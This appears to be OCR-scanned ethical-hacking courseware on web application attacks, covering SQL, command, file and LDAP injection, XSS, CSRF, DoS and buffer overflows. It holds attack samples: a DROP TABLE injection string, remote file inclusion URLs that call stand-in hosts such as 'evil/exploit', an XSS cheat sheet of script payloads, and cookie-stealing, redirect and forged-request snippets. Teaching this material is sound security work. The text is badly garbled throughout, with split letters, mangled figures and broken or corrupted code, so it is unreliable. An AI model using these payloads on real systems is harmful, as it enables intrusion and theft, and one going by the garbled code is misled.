J An a tta cke r can use a v u ln e ra b le w e b a p p lic a tio n to bypass n o rm a l s e c u rity
attacks
m e asu re s and o b ta in d ire c t access to th e v a lu a b le data
J SQL in je c tio n atta cks can o fte n be executed fr o m th e a dd re ss b ar, fro m
w ith in a p p lic a tio n fie ld s , and th ro u g h queries and searches
01 <?php
02 fu n c tio n save e m a il( $ u s e r , $m essage)
W eb ....................... ■נ In te r n e t 03 {
B ro w s e r 04 $sql = "IN S E R T IN T O M e s s a g e s (
05 u s e r, m essage
06 ) V A LU E S (
07 ' $ u s e r1, ' $m essage'
t e s t ') ; D R O P T A B LE M e s s a g e s ; - -
08 )
09 re tu rn m y s q l_ q u e r y ( $ s q l) ;
W hen th is code is sent to th e d atabase
10 }
server, it d ro p s th e Messages ta b le
11 ?>
A tta c k e r t e s t ') , ( 'u s e r 2 ', '1 am J a s o n ' ) , ( ' u s e r3 ', 'Y o u a re hacked
N o te : For c o m p le te coverage o f SQL Injectio n concepts and techniques, refe r t o M o d u le 14: SQL Injectio n
S Q L In je c tio n A tta c k s
SQL in je c tio n a tta cks use c o m m a n d sequences fro m S tru c tu re d Q u e ry Language (SQL)
s ta te m e n ts to c o n tro l d atabase data d ire c tly . A p p lic a tio n s o fte n use SQL s ta te m e n ts to
a u th e n tic a te users to th e a p p lic a tio n , v a lid a te roles and access levels, sto re and o b ta in
in fo rm a tio n fo r th e a p p lic a tio n and user, and lin k to o th e r data sources. Using SQL in je c tio n
m e th o d s , an a tta c k e r can use a v u ln e ra b le w e b a p p lic a tio n to avoid n o rm a l s e c u rity m easures
and o b ta in d ire c t access to v a lu a b le data.
The reason w h y SQL in je c tio n atta cks w o rk is th a t th e a p p lic a tio n does n o t p ro p e rly v a lid a te
in p u t b e fo re passing it to a SQL s ta te m e n t. For e xa m p le , th e fo llo w in g SQL s ta te m e n t,
select * from ta b le n a m e where U ser1D = 2302 becom es th e fo llo w in g w ith a sim p le SQL
in je c tio n a tta c k :
SELECT * FROM ta b le n a m e WHERE U s e rID = 2302 OR 1=1
The expressio n "OR 1=1" eva lu a te s to th e va lu e "TRUE," o fte n a llo w in g th e e n u m e ra tio n o f all
user ID values fro m th e databa se. SQL in je c tio n a tta cks can o fte n be e n te re d fro m th e address
bar, fro m w ith in a p p lic a tio n fie ld s, and th ro u g h q u e rie s and searches. SQL in je c tio n atta cks can
a llo w an a tta c k e r to :
© P e rfo rm q u e rie s against data in th e database, o fte n even data to w h ic h th e a p p lic a tio n
w o u ld n o t n o rm a lly have access
mi 01 <?php
Code to insert spammy data on behalf of o th e r users SQL Injection vulnerable server code
FIG U R E 1 3 .8 : S Q L I n je c t io n A tt a c k s
C o m m a n d I n je c t io n A t t a c k s C E H
J A n a tta c k e r tr ie s t o c r a f t a n in p u t s tr in g t o g a in s h e ll a cce ss t o a w e b s e rv e r
J S h e ll In je c t io n fu n c tio n s in c lu d e s y s t e m ( ) , s t a r t P r o c e s s ( ) ,
j a v a . l a n g . R u n t im e . e x e c ( ) , S y s t e m . D i a g n o s t i c s . P r o c e s s . S t a r t ( ) ,
a n d s im ila r A P Is
In H T M L e m b e d d in g a tta c k s , u s e r in p u t t o a w e b s c r ip t is p la c e d in t o t h e o u t p u t
H T M L , w it h o u t b e in g c h e c k e d f o r H T M L c o d e o r s c r ip t in g
J h t t p : / /w w w . j u g g y b o y . c o m / v u l n e r a b l e . p h p ? C O L O R = h t tp : / / e v i l / e x p l o i t ?
C o m m a n d In je c tio n A tta c k s
^= = 3 S h e ll I n j e c t i o n
1 To c o m p le te v a rio u s fu n c tio n a litie s , w e b a p p lic a tio n s use va rio u s a p p lic a tio n s and
p ro g ra m s. It is ju s t like se n d in g an em a il by using th e U N IX sendm ail p ro g ra m . T here is
a chance th a t an a tta c k e r m ay in je c t code in to th e se pro g ra m s. This kind o f a tta c k is d ange ro us
Shell in je c tio n fu n c tio n s in c lu d e system (), S ta rt Process (), ja va .la n g .R u n tim e .e x e c (),
S yste m .D ia gn o stics.P roce ss.S tart (), and s im ila r APIs.
H T M L E m b e d d in g
This ty p e o f a tta c k is used to defa ce w e b s ite s v irtu a lly . Using th is a tta c k , an a tta c k e r
adds e x tra H TM L-based c o n te n t to th e v u ln e ra b le w eb a p p lic a tio n . In HTML
e m b e d d in g a tta cks, user in p u t to a w e b s c rip t is placed in to th e o u tp u t HTML, w ith o u t being
checked fo r HTM L code o r s c rip tin g .
F ile I n je c t io n
a The a tta c k e r e x p lo its th is v u ln e ra b ility and in je cts m a licio u s code in to system file s:
Users are a llo w e d to u plo a d v a rio u s file s on th e se rve r th ro u g h va rio u s a p p lic a tio n s and th o se
file s can be accessed th ro u g h th e In te rn e t fro m any p a rt o f th e w o rld . If th e a p p lic a tio n ends
w ith a p hp e x te n s io n a n d if any user re quests it, th e n th e a p p lic a tio n in te rp re ts it as a php s c rip t
and exe cute s it. This a llo w s an a tta c k e r to p e rfo rm a rb itra ry co m m a n d s.
C o m m a n d I n je c t io n E x a m p le
M a lic io u s co de :
w w w . ju g g y b o y .c a m /b a im e r .g ifl|n e w p a s s w o r d ||1 0 3 6
^ J u g g y B o y c o m
|6 0 |4 6 8
Use r Nam e
C Addison
Email Address a d d i@ ju g g y b o y .c o ~
S An a tta cke r e n te rs m a lic io u s co de (a cco u n t נ
n u m b e r) w ith a n ew p a ssw o rd Site URL ^ w w w .juggyboy.com
כ
B a nn e r URL [ ■gif | |newpassword|1036|60|468
C o m m a n d In je c tio n E x a m p le
©
A tta c k e r L a u n c h in g C o d e
In je c tio n A tta c k
M [•..................... > I\ f http //juggYtx>y/cgi bin/lspr0/lspf0cgi?ht1 out 1036
M a lic io u s code:
w w w .^ u g g y b o y .c o m /b a n n e r .g ifl|n e w p a s s w o r d l|1 0 3 6
.com
1601468
U M f N«m« Addison
Password [ ncwpjsswofd ] !
P o o r in p u t v a lid a t io n a t s e rv e r
s c r ip t w a s e x p lo it e d in t h is a tta c k
t h a t u s e s d a t a b a s e IN SER T a n d
U P D A T E re c o r d c o m m a n d
FIG U R E 1 3 .9 : C o m m a n d I n je c t io n E x a m p le
F i l e I n j e c t i o n A t t a c k C E H
<?php
GO $ d r in k = 'c o k e ';
if ( is s e t ( $ _ G E T [ 'D R IN K '] )
< form m e t h o d = " g e t"> $ d r iinn k = $ _ G ET [ 'D R IN K '] ;
< s e l e c t name="DRINK"> rr ee qq uu iirree (( J
$ d r in k . ' .p h p ’ ) ;
< o p t io n v a lu e = " p e p s i" > p e p s i< /o p t io n > ?>
< o p t io n v a lu e = " c o k e >ייco k e< / o p t i on>
< /s e le c t>
C in p u t t y p e ="s u b m it ">
< /fo r m >
ך : .....
C lie n t code ru n n in g in a b ro w s e r
h t t p : //w w w .j u g g y b o y .c o m /o r d e r s .p h p ? D R I N K = h t t p : / / j a s o n e v a l . c o m / e x p l o i t ? <
A tta c k e r
V u ln e ra b le PHP co de
<?php
$ d r in k = 'c o k e ';
if ( is s e t( $ _ G E T ['D R IN K '] ) )
$ d r in k = $_GET[ 'D R IN K ' ] ;
r e q u ir e ( $ d r in k . ' .p h p ' );
?>
E x p lo it cod e
W h a t I s L D A P I n j e c t i o n ? C E H
I (•rtifwtf itfciul ■UtlM
A n LD AP in je c tio n te c h n iq u e is u s e d t o ta k e a d v a n ta g e o f n o n - v a lid a te d w e b
a p p lic a t io n in p u t v u ln e r a b ilit ie s t o p ass L D A P f i l t e r s u s e d f o r s e a r c h in g D ir e c to r y
S e rv ic e s t o o b t a in d ir e c t a c c e s s t o d a ta b a s e s b e h in d a n L D A P t r e e
F ilte r
( a t t r ib u t e N a m e o p e ra to r v a lu e )
Syntax
LDAP D ire c to ry Services
s to re and organize O p e ra to r Example
in fo rm a tio n based on its
(*■ a ttrib u te s . The in fo rm a tio n = ( a b je c tc la s s = u s e r )
a. is hie ra rc h ic a lly organized
as a tre e o f d ire c to ry (m d b S to ra g e Q u o ta > = l00000)
WJ >=
entries
Q
(m d b S to ra g e Q u o ta < = l00000)
J <=
V)
•H p (d i s p 1ayName ~=Foecke1e r )
~=
(0 * (d isp la yN a m e —* J o h n * )
A LDAP is based on th e
N O T (!) ( fo b je c tC la s s = g ro u p )
W h a t is L D A P In je c tio n ?
F ilte r
( a tt r ib u t e N a m e o p e ra to r v a lu e )
S yntax
O p e ra to r E xam ple
( d i sp la y N a m e ~ = F o e c k e l e r )
(d i s p la y N a m e = *J o h n * )
A N D (& ) (S (o b je c tc la s s = u s e r )(d is p la y N a m e = J o h n )
OR ( | ) (& (o b j e c t d s s s = u s e r ) (d ± sp la y N a m e= J o h n )
NOT (I) ( ! o b j e c t C la s s = g r o u p )
FIG U R E 1 3 .1 0 : L D A P I n je c t io n
H o w L D A P I n je c t io n W o r k s C E H
n
N orm al Q u e ry
N orm al Q u e ry + Code Injection
LDAP LDAP
N orm al Result N orm al Result a n d /o r
Add itio na l Inform ation
C lien t LDAP S erver C lient LDAP S erver
LDAP in je c tio n attacks are s im ila r to SQL in je c tio n a tta cks b u t e x p lo it u s e r p a ra m e te rs to g e n e ra te LDAP q u e ry
H o w L D A P In je c tio n W o rk s
(H U LDAP in je c tio n a tta cks are c o m m o n ly used on w e b a p p lic a tio n s . LDAP is a p p lie d to any
o f th e a p p lic a tio n s th a t have som e kind o f user in p u ts used to g e n e ra te th e LDAP qu e rie s. To
te s t if an a p p lic a tio n is v u ln e ra b le to LDAP code in je c tio n , send a q u e ry to th e se rve r th a t
g e n e ra te s an in v a lid in p u t. If th e LDAP se rve r re tu rn s an e rro r, it can be e x p lo ite d w ith code
in je c tio n te c h n iq u e s .
© Login Bypass
© In fo rm a tio n D isclosure
e P rivilege Escalation
Normal operation
*•י־ N o rm a l Q u e ry
N o rm a l R e s u lt
FIG U R E 1 3 .1 1 : N o r m a l o p e r a t io n
N o rm a l Q u e ry
+ C o de In je c tio n
ץ
< □ c LD A P
N o rm a l R e s u lt a n d /o r
A d d itio n a l In fo rm a tio n
Client LDAP Server
FIG U R E 1 3 .1 2 : O p e r a t io n w it h c o d e in je c t io n
Attack
If an a tta c k e r e n te rs a valid user nam e o f " ju g g y b o y " and in je c ts ju g g y b o y ) ( &) ) , th e n th e URL
s trin g becom es (& ( u s e r = ju g g y b o y ) ( &) ) (P A S S = b la h )). O nly th e firs t filte r is processed by th e
LDAP serve r; o n ly th e q u e ry ( & (USER= ju g g y b o y ) ( &) ) is processed. This q u e ry is alw ays tru e ,
and th e a tta c k e r logs in to th e system w ith o u t a va lid passw ord.
A c c o u n t Login
U s e rn a m e ju g g y b o y )(& ))
: P a s s w o rd blah
A tta c k e r
FIG U R E 1 3 .1 3 : A t t a c k
H id d e n F ie ld M a n ip u la tio n A tta c k I C E H
N o rm a l R e q u e st
HTM L Code
h t tp : / /w w w . ju g g y b o
< f o m m ethod="post"
a c tio n ^ " p a g e .a sp x " > y . c o m /p a g e . a s p x ? p r
<in p u t typ e= " h id d en " name= o d u c t= J u g g y b o y % 2 O S A tta c k R eq u e st
"PRICE" v a l u e 200 . 0 0 " >" ־ h i r t & p r i c e = 2 0 0 .0 0
P r o d u ct name: < in p u t ty p e =
" t e x t ״nam e="product" h t t p : / /w w w . j u g g y b o
v a lu e ="Juggyboy S h i r t " X b r> y . c o m /p a g e . a s p x ? p r
P r o d u ct p r i c e : 2 0 0 .0 0 " X b r > o d u o t= J u g g y b o y % 2 0 S
< in p u t type=" subm it" v a lu e = h ir t & p r ic e = 2 . 00
" subm it" >
< /fo rm >
H id d e n F ie ld M a n ip u la tio n A tta c k
H idden m a n ip u la tio n a tta cks are m o s tly used against e ־c o m m e rc e w e b site s to d a y .
M a n y o n lin e stores face th e se p ro b le m s . In e ve ry c lie n t session, d e ve lo p e rs use h id d e n fie ld s to
s to re c lie n t in fo rm a tio n , in c lu d in g p rice o f th e p ro d u c t (In clu d in g d is c o u n t rates). A t th e tim e o f
d e v e lo p m e n t o f th e se such p ro g ra m s, d e ve lo p e rs fe e l th a t all th e a p p lic a tio n s d e ve lo p e d by
th e m are safe, b u t a hacker can m a n ip u la te th e prices o f th e p ro d u c t and c o m p le te a
tra n s a c tio n w ith price th a t he o r she has a lte re d , ra th e r th a n th e a ctual price o f th e p ro d u c t.
N o rm a l R e q u e st
H T M L Code
h t t p : / /w w w . ju g g y b o
< form m e th o d = " p o st" H id d e n F ie ld
;»nt־.־i n n s " p a g « . a«spx"> y . c o m /p a g e . a s p x ? p r
o d u c t = J u g g y b o y % 2OS P ric e = 2 0 0 .0 0
< i n p u t ty p e = " 11id d e n " name= A tt a c k R e q u e s t
"PRICE" v a lu e = " 2 0 0 .0 0 " > h i r t f i p r i c e = 2 0 0 .0 0
P r o d u c t n a m e: < i n p u t ty p e =
" t e x t " n a m e= " p ro d u ct" h t t p : / / w w w . ju g g y b o
v a lu e = " J u g g y b o y S h i r t " X b r > y . c o m /p a g e . a s p x ? p r
P r o d u c t p r i c e : 2 0 0 .0 0 " > < b r > o d u c t= J u g g y b o y % 2 0 S
< i n p u t ty p e = " s u b m it" v a lu e = h i r t & p r ic e = 2 .0 0
" su b n '.it,,>
< / f o r : >״
1 ! "
F IG U R E 1 3 .1 4 : H id d e n F ie ld M a n i p u la t i o n A t t a c k
It o c c u rs w h e n in v a lid a te d in p u t d a ta is in c lu d e d in d y n a m ic c o n t e n t t h a t is s e n t t o a u s e r's w e b b r o w s e r
f o r r e n d e r in g
C r o s s - S ite S c r ip tin g (X S S ) A t t a c k s
C ross-site s c rip tin g is also called XSS. V u ln e ra b ilitie s o ccu r w h e n an a tta c k e r uses w e b
a p p lic a tio n s and sends m a licio u s code in JavaScript to d iffe re n t end users. It occurs w h e n
in v a lid a te d in p u t data is in c lu d e d in d y n a m ic c o n te n t th a t is se n t to a user's w e b b ro w s e r fo r
re n d e rin g . W h e n a w e b a p p lic a tio n uses in p u t fro m a user, an a tta c k e r can c o m m e n c e an
a tta c k using th a t in p u t, w h ic h can p ro p a g a te to o th e r users as w e ll. A tta c k e rs in je c t m a licio u s
JavaScript, V B S cript, A ctiveX , HTML, o r Flash fo r e x e c u tio n on a v ic tim 's system by h id in g it
w ith in le g itim a te requests. The end user m ay tru s t th e w e b a p p lic a tio n , and th e a tta c k e r can
e x p lo it th a t tru s t in o rd e r to do th in g s th a t w o u ld n o t be a llo w e d u n d e r n o rm a l c o n d itio n s . An
a tta c k e r o fte n uses d iffe r e n t m e th o d s to enco d e th e m a lic io u s p o rtio n (U nicode) o f th e tag, so
th a t a re q u e s t seem s g e n u in e to th e user. Som e o f th e m are:
H o w X S S A t t a c k s W o r k C E H
N o rm a l R e q u e st T h is e x a m p le u s e s a
ra b le p a g e w h ic h h a n d le s
f o r a n o n e x is t e n t p a g e s,
a c la s s ic 4 0 4 e r r o r p ag e
( H a n d le s r e q u e s ts f o r a
n o n e x is te n t p a g e , a
c la s s ic 4 0 4 e r r o r p a g e )
S e rv e r
S H o w X S S A tta c k s W o rk
N orm al Request
h t t p : / / ju g g y b o y .c o m / כa s o n _ f i l « . h t m l
/ j a s o n _ f i l e . h tm l
S e rv e r C ode (H an d les re q u e sts fo r a
S erver Response n o n e x is te n t page, a
< h fc m l> c las tic 4 0 A e r ro r p a g e )
<body>
< ? p hp
p r i n t "N ot fo u n d : "
XSS Attack Code u r ld e a o d e ($_SERVER["
REQUEST_URI"] ) ;
Server Response
?>
< /b o d y >
n
< /h t m l> Server
H i, Y o u h a v e w o n a U ser clicks
lo t t e r y o f $ 2 M , d ick th e m alicious link
t h e li n k t o c la im it.
<A
H R E F = h ttp ;//ju g g y b o y .
S e n d s e m a il w it h
c o m /....
m a lic io u s lin k
S e rve r se n d s a
Name: Shaun page to th e u ser
Age: 31 w i t h c lie n t p r o f ile
Location: UK
Occupation: SE
^ <..................
M a lic io u s c o d e is e x e c u t e d
Last visH: Sept 21,2010
o n t h e c lie n t w e b b r o w s e r
A tta c k e r
In th is exam ple, th e a tta cke r c ra fts an em ail m essage w ith a m alicious s c rip t and sends it to th e v ic tim :
<A HREF=h t t p : / / l e g i t i m a t e S i t e . c o m / r e g i s t r a t io n . c g i? c lie n t p r o file = < S C R IP T >
m a lic io u s c o d e c /S C R I P T » C lic k h e re < /A >
In a crosssite s c rip tin g a tta c k via em a il, th e a tta c k e r cra fts an em a il th a t co n ta in s a lin k
to m a lic io u s s c rip t and sends it to th e v ic tim .
M a lic io u s S crip t:
<A HREF=h t t p : / / l e g i t i m a t e S i t e . c o m / r e g i s t r a t i o n . c g i? c lie n t p r o f ile = < S C R I P T >
m a lic io u s c o d e < /S C R IP T » C lic k h e re < /A >
The fo llo w in g d ia g ra m d e p ic ts th e cross-site s c rip tin g a tta c k sce n a rio a tta c k via em a il:
R e q u e s t Is re c e iv e d
b y le g it im a t e s e rv e r
FIG U R E 1 3 .1 6 : A t t a c k v ia E m a il
X S S E x a m p le : A t t a c k v ia E m a il C E H
rrr 1
L e g itim a te
U s e r's M a lic io u s A tt a c k e r 's
S e rv e r
B ro w s e r S c r ip t S e rv e r
< A H R E F=h t t p : / / ju g g y b o y b a n k . c a n /
Mi
th e URL t o u s e r a nd c o n v in c e u s e r to c lic k on i t
_ R e q u e st th e page
o ......................!•
Page w it h m a lic io u s s c rip t
— Run
© .......
X S S E x a m p le : A tta c k v ia E m a il
IS
L egitim ate
User's M alicious A tta c k e rs
Server
Brow ser Script Server
FIG U R E 1 3 .1 7 : A t t a c k v ia E m a il
X S S E x a m p le : S te a lin g U s e rs '
C E H
C o o k ie s
^ ^ vkV
i eieww th e page h o s te d Dy
by th e a tta c k e r
H TM L c o n ta in in g m a lic io u s s c r i p t !
»........................... ז......................© - !
Run
@
C o lle c t u s e r's c o o k ie s
X S S E x a m p le : S te a lin g U s e rs * C o o k ie s
To steal th e user's cookies w ith th e he lp o f an XSS a tta ck, th e a tta c k e r looks fo r XSS
vu n e ra b ilitie s and th e n insta lls a c o o k ie s te a le r (co o kie logger).
The fo llo w in g are th e v a rio u s steps in v o lv e d in ste a lin g user's cookies w ith th e help o f XSS
a tta c k :
I I
H T M L c o n ta in in g m a lic io u s script
!<•
R un
@ I
.......... •>
C o lle c t u s e r’s c o o k ie s
XSS E x a m p le : S e n d in g a n
C E H
U n a u th o r iz e d R e q u e s t
A tt a c k e r 's
U s e r's M a lic io u s A tt a c k e r 's
S e rv e r
B ro w s e r S c r ip t S e rv e r
Run
A n a u th o riz e d re q u e s t
X S S E x a m p le : S e n d in g a n U n a u th o r iz e d R e q u e s t
Using an XSS a tta c k , th e a tta c k e r can also send an u n a u th o riz e d re q u e st. The
fo llo w in g are th e steps in v o lv e d in an XSS a tta c k in te n d e d to send an u n a u th o riz e d re q u e s t:
4. The a tta c k e r's se rve r in response to th e user's re q u e s t sends th e page w ith m a licio u s
s c rip t
FIG U R E 1 3 .1 9 : S e n d in g a n U n a u th o r iz e d R e q u e s t
X S S A t t a c k i n B lo g P o s t in g C E H
4 a ►
Malicious code
<script>onload=
window.Iocation=
' http://www.juggYboy.com'
</script>
is injecting the blog post
U s e r r e d ir e c t e d t o a m a lic io u s
w e b s it e ju g g y b o y .c o m
W eb A p p lic a tio n
M a lic io u s W eb site
1 3 5 X S S A tta c k in a B lo g P o s tin g
M alicio u s c o d e
<script>onload=
A tta c k e r adds a m alicious s c rip t in w in d o w . location=
th e c o m m e n t fie ld o f blog post 'h ttp ://w w w .ju g g y b c y .c o m '
</script>
is in je c tin g t h e blog post
C o m m e n t w ith
m a lic io u s lin k is
s to re d on th e server
U s e r r e d ir e c t e d t o a m a li c i o u s
w e b s it e ju g g y b o y .c o m
X S S A t t a c k in C o m m e n t F ie ld C E H
oooo
U s e r v is it s th e
I Tech Post
w e b s it e Face book acquires file-sharing service
New York-based start-up that lets users privately
and sporadicaty share fles through a drag-and-
drop interface with additional options----------
C om m ent
Jason, I love your blog post!
- Mark (mark@miccasoft.com)
Leave y o u r c o m m en t
M alicious code
< s c r ip t » a le r t ( " H e ll
o Wor I d ") < / sc r ip t>
is in je ctin g th e blog post
H I
ן H^lnVWnild
C o m m e n t w it h T h e a le r t p o p s u p as s o o n
m a lic io u s lin k is a s t h e w e b p a g e is lo a d e d I <*......i
s to r e d o n th e s e r v e r
D a ta b a s e S e rv e r W e b A p p lic a t io n P o p u p W in d o w
J X S S A tta c k in a C o m m e n t F ie ld
■ ....
M a n y In te rn e t w e b p ro g ra m s use HTM L pages th a t d y n a m ic a lly a ccept data fro m
d iffe r e n t sources. The data in th e HTM L pages can be d y n a m ic a lly change d a cco rd in g to th e
re q u e s t. A tta c k e rs use th e HTM L w e b page's tags to m a n ip u la te th e data and to launch th e
a tta c k by chan gin g th e c o m m e n ts fe a tu re w ith a m a licio u s s c rip t. W h e n th e ta rg e t sees th e
c o m m e n t and a c tiva te s it, th e n th e m a lic io u s s c rip t is e xe cu te d on th e ta rg e t's b ro w s e r,
in itia tin g m a lic io u s p e rfo rm a n c e s .
aas
1 IcchPoM
1 ------- ---------- - •יי היי IMOM | n.Ort.TOlO
Facebook acquires file-sharing service
N#w York baved start ■up that !•tt users privately
end sporadically share files through a drag and
drop interfece with Additional op tio n s.----------
L eave y o u r c o m m e n t
A ttacke r
J a s o n , 11o v a y o u r b lo g p o s t!
< s c rip t> a le rt(H e llo
W o rld " ) < / s c r i p t >
M a lic io u s cod e
A tta c k e r adds a m alicious s cript < s c r ip t > a le r t ( " H e ll
In th e c o m m e n t fie ld o f blog post o W o r ld " ) < / s c r ip t >
is in je c tin g th e b lo g p o st
FIG U R E 1 3 .2 1 : XSS A t t a c k in a C o m m e n t F ie ld
X S S C h e a t S h e e t H C E H
U ilifM itkiul Mm few
N o rm a l XSS JavaScript in je ctio n : <SCRIPT NuN Chars: p e ri -e 'p rin t "<1MG IM G lo w src:<IM G
SRC=h ttp ://h a x k e rs .o rg /x s s .js x /S C R IP T > SRC=java\Oscri p t : ale rt(\" X S S \" )> " ;'> o u t DYNSRC " ־Ja va sa lp t: ale r t f XSS>־(־
Im age XSS: <IM G SRC=־־ja va scrip t:alert('X S S >";)־ N o n -a lp h a-n o n -d ig it XSS: <SCR1PT/XSS IM G lo w src:<IM G
SRC=" h ttp ^ /h a .d c e rs ^ fg /x s s .js " x /S C R !P T > LOWSRC=" ja vascript :alert('X SS')">
N o q u o te s a n d no sem icolon: <IM G
N o n -a lp h a-n o n -d ig it p a rt 2 XSS: <BODY BGSOUND:<BGSOUND
SR C =javascript:alert(־XSS')> o n lo ad ! # $ % & ( ) - + 1 / ] @ ?;:,.\ ־K '= a le rt< ״XSS>)״ SRC ״ ־ja v a s a lp t :ale rt('X SS '(;< ־׳
Case in sensitive XSS atta c k ve cto r: <IM G
Extran eo u s o p e n brackets: LAYER:<LAYER SRC=
SRC=JaVaScRIPt:alert('XSS')> «SC R JPT>alert("X SS") ; / / « / SCR1PT> " h t t p : //h a x k e r s .o r g / script le th tm T x /L A Y E R >
E m b e d d ed ta b : < IM G SRC«"Jav
D ouble o p e n angle b rackets: < lfram e
ascrip t:aiert('X S S ');H> M o ch a: <IM G SRC" ־H vescript:[code]">
src ־h t tp : //h a .c k e rs.o rg /scrip tlet.h tm i <
E m b e d d ed en c o d ed ta b : < IM G
XSS w ith no single q u o te s o r d o u ble q uotes or
SRC ־ ־ja v & # x 0 9 ;a s c rlp t:ale rt ( ,XSS‘);" > US-ASCII encoding: is a ip tu a le rt(E X S S E )i/s a ip tu
sem icolons: SCRIPT>alert (/X S S /s o u rc e K/SCRIPT>
XSS C h e a t S h e e t
Em b ed d ed ca rria g e r e t u r n : י.IM G
XSS lo c ato r ' ־. ׳- < ־X S S > = * { () }
S R C = *jfg ^ k O O .a s c n p t a t e f t f X S S ' ^
C ro ss-S ite R e q u e s t F o rg e ry (C S R F)
E l\
A tta c k c
(*rtifxd 1 lt»K4l IlMtm
fc
U ser T ru s te d W e b s ite M a lic io u s W e b s ite
S to re s th e s e s s io n id e n t f ie r f o r t h e י
se s s io n in a c o o k ie in th e w e b b ro w s e r
...... 1 ©
...
S e n d s a re q u e s t f r o m th e u se r's
! u sin g his se s s io n c o o k ie
© 41!
C o p y r ig h t © b y E&C01nal.A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S t r ic t ly P ro h ib ite d .
C r o s s - s ite R e q u e s t F o r g e r y (C S R F ) A tta c k
User
□O
Trusted Website Malicious Website
>י־ Visits a ma
F IG U R E 1 3 . 2 3 : C r o s s - s it e R e q u e s t F o r g e r y (C S R F ) A t t a c k
H o w C S R F A tta c k s W o r k
In a c r o s s - s ite r e q u e s t f o r g e r y a tta c k , t h e a t t a c k e r w a i t s f o r t h e u s e r t o c o n n e c t t o t h e
t r u s t e d s e r v e r a n d t h e n t r ic k s t h e u s e r t o click o n a m a lic io u s lin k c o n t a i n i n g a r b i t r a r y co d e .
W h e n t h e u s e r clicks o n t h e m a lic io u s lin k , t h e a r b i t r a r y c o d e g e ts e x e c u t e d o n t h e t r u s t e d
s e rv e r. T h e f o l l o w i n g d ia g r a m e x p la in s t h e s t e p - b y - s t e p p ro c e s s o f a CSRF a tta c k :
Symbol k <<?php
Shares £
<form action= buy.php"
method="POST">
User logs into trusted server using his credentials
o
s e s s io n _ s ta r t();
if
&&
(isset($_REQUEST[' sy m b o l']
©
Attacker sends a phishing mall tricking
user to send a request to a malicious site
Attacker
ט
Malicious Code
Response page contains malicious code
0 < im g
s r a = " h t t p : / / j u g g y b o y . o o ra /j
u g g y s h o p . p h p ? s y m b o l= M S F T & s
User requests a page from the malicious server Malicious
h a r e s = 1 0 0 0 ,r / >
Server
F IG U R E 1 3 . 2 4 : H o w C S R F A t t a c k s W o r k
W e b A p p lic a t io n D e n ia l- o f - S e r v ic e
(D o S ) A t t a c k
CEH
•
Targets Application-level DoS attacks emulate the
i ג CPU, Memory, and Sockets same request syntax and network-level
B O B traffic characteristics as that of the
: - Disk Bandwidth
: legitimate clients, which makes it
i - Database Bandwidth B O B undetectable by existing DoS protection :
: - Worker Processes measures :
T h e f o l l o w i n g issues m a k e t h e w e b a p p li c a t i o n s v u ln e r a b l e :
© R e a s o n a b le Use o f E x p e c t a t i o n s
© A p p l i c a t i o n E n v i r o n m e n t B o ttle n e c k s
© I m p l e m e n t a t i o n Flaws
© P o o r D ata V a l id a t i o n
S o m e o f t h e c o m m o n w a y s t o p e r f o r m a w e b a p p l i c a t i o n DoS a t t a c k a re :
■ © B a n d w i d t h c o n s u m p t i o n - f l o o d i n g a n e t w o r k w i t h d a ta
Q R e s o u rc e s t a r v a t i o n - d e p l e t i n g a s y s te m 's re s o u r c e s
© R o u t i n g a n d D N S a t t a c k s - m a n i p u l a t i n g D N S t a b l e s t o p o i n t t o a l t e r n a t e IP a d d r e s s e s
D e n ia l- o f - S e r v ic e (D o S ) E x a m p le s CEH
D e n ia l־o f־S e r v ic e (D o S ) E x a m p le
M o s t w e b a p p l i c a t i o n s a r e d e s i g n e d t o s e r v e o r w i t h s t a n d w i t h l i m i t e d r e q u e s t s . If t h e
l i m i t is e x c e e d e d , t h e w e b a p p l i c a t i o n m a y f a i l t h e s e r v e r t h e a d d i t i o n a l r e q u e s t s . A t t a c k e r s u se
a d v a n ta g e to la u n c h d e n ia l-o f-s e rv ic e a tta c k s o n th e w e b a p p lic a tio n s . A tta c k e rs se n d to o m a n y
r e q u e s ts t o th e w e b a p p lic a tio n u n til it g e ts e x h a u s te d . O n c e th e w e b a p p lic a tio n re c e iv e s
e n o u g h r e q u e s t s , i t s t o p s r e s p o n d i n g t o o t h e r r e q u e s t t h o u g h i t is s e n t b y a n a u t h o r i z e d u s e r .
T h is is b e c a u s e t h e a t t a c k e r o v e r r i d e s t h e w e b a p p l i c a t i o n w i t h f a l s e r e q u e s t s . V a r i o u s w e b
a p p l i c a t i o n DoS a t t a c k s i n c l u d e :
N o te : For c o m p le te coverage o f b u ffe r o v e rflo w conce pts and techniques, refe r to M o d u le 18: B u ffer O v e rflo w
A r b itr a r y C ode
B o th t h e w e b a p p li c a t i o n a n d s e r v e r p r o d u c t s , w h i c h a c t as s ta tic o r d y n a m i c f e a t u r e s
o f t h e s ite o r o f t h e w e b a p p li c a t i o n , c o n t a i n t h e p o t e n t i a l f o r a b u f f e r o v e r f l o w e r r o r .
B u f f e r o v e r f l o w p o t e n t i a l t h a t is f o u n d in s e r v e r p r o d u c t s is c o m m o n l y k n o w n a n d c r e a te s a
th re a t to th e user o f th a t p ro d u c t. W hen web a p p li c a t i o n s use lib r a r ie s , t h e y becom e
v u ln e r a b l e t o a p o s s ib le b u f f e r o v e r f l o w a tta c k .
C u s to m w e b a p p li c a t i o n co d e , t h r o u g h w h i c h a w e b a p p li c a t i o n is passed, m a y also c o n ta in
b u f f e r o v e r f l o w p o t e n t ia l . B u f f e r o v e r f l o w e r r o r s in a c u s t o m w e b a p p li c a t i o n a re n o t e a s ily
d e t e c t e d . T h e r e a re f e w e r a tt a c k e r s w h o fin d a n d d e v e lo p such e rr o r s . If it is f o u n d in t h e
c u s t o m a p p li c a t i o n ( o t h e r t h a n crash a p p li c a t i o n ) , t h e c a p a c it y t o use t h is e r r o r is r e d u c e d by
t h e f a c t t h a t b o t h t h e s o u r c e c o d e a n d e r r o r m e s s a g e a re n o t a cc e ssib le t o t h e a tta c k e r .
V u ln e ra b le C ode
char *d e s t_ b u ffe r;
if (NULL == d e s t _ b u f f e r )
re tu rn -1 ;
if (a rg c > 1) {
re tu rn 0; }
N o t e : For c o m p l e t e c o v e r a g e o f b u f f e r o v e r f l o w c o n c e p t s a n d t e c h n i q u e s , r e f e r t o M o d u l e 17:
B u f f e r O v e r f l o w A tta c k s .
I
Cookie/Session Poisoning CEH
(•rtifWd I itk itjl Nm Im
Cookies are used to m aintain session state in the otherw ise stateless HTTP protocol
C o o k ie p o i s o n i n g a t t a c k s P o is o n in g a l lo w s a n A p ro x y ca n be used fo r
